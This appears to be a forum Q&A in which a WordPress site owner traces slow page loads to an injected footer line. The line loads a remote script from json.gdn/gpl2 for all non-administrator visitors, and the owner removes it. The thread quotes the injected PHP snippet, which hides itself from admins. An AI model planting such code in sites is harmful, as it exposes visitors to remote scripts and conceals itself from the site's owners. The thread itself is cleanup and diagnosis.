# Website takes over 30 seconds to load because of json.gdn/gpl

Tags: javascript, json, wordpress, pagespeed, mod-pagespeed

My website, https://robertfreericks.com, takes over 30 seconds to fully load because of a file called "json.gdn/gpl". I have absolutely no clue how to fix this. I found out about this problem on http://www.webpagetest.org/.

Can someone please look into this? I've been stuck for several days now and a I'm a noobie in coding.

Thanks a lot in advance!

Comment: `https://json.gdn/` is giving you a 522 error, seen as this is failing, do you even need this link in your webpage?

Comment: Seems like module to preload things. Probably from 'Filament Group'. Just try to disable modules one by one to find which is causing this.

Comment: Thanks a lot for your response. Really appreciate it! By module, do you mean plugins?

Comment: @Keith I don't know to be honest. But I also don't know how to delete it. I can't find the path... Would you know how to delete it?

Comment: This is your problem file -> `<script type='text/javascript' src='https://json.gdn/gpl2'></script>`   I'm not a wordpress user, but I've a feeling you have a plugin / theme called `tdMacro`,.. It looks like it's been deleted,..  https://wordpress.org/support/topic/json-gdn-gpl2/

Comment: @keith Thanks a lot for your efforts. I can't locate the file or plugin unfortunately. I will keep digging in my files to see if I can fix it. Cheers!

Comment: Thanks a lot guys. I fixed it. In case anyone wants to know, I used  String Locator and searched for json.gdn/gpl2 to locate the files. Then I deleted the following line in all files that came up: <?php echo current_user_can('manage_options')?'':"<script type='text/javascript'src='http://json.gdn/gpl2'></script>";?><?php

Answer (score -1):

I found file injection with this include in my footer.php - just searched thru all files for text "json.gdn"

```
php echo current_user_can('manage_options')?'':"script type='text/javascript'src='**http://json.gdn/gpl2**'
```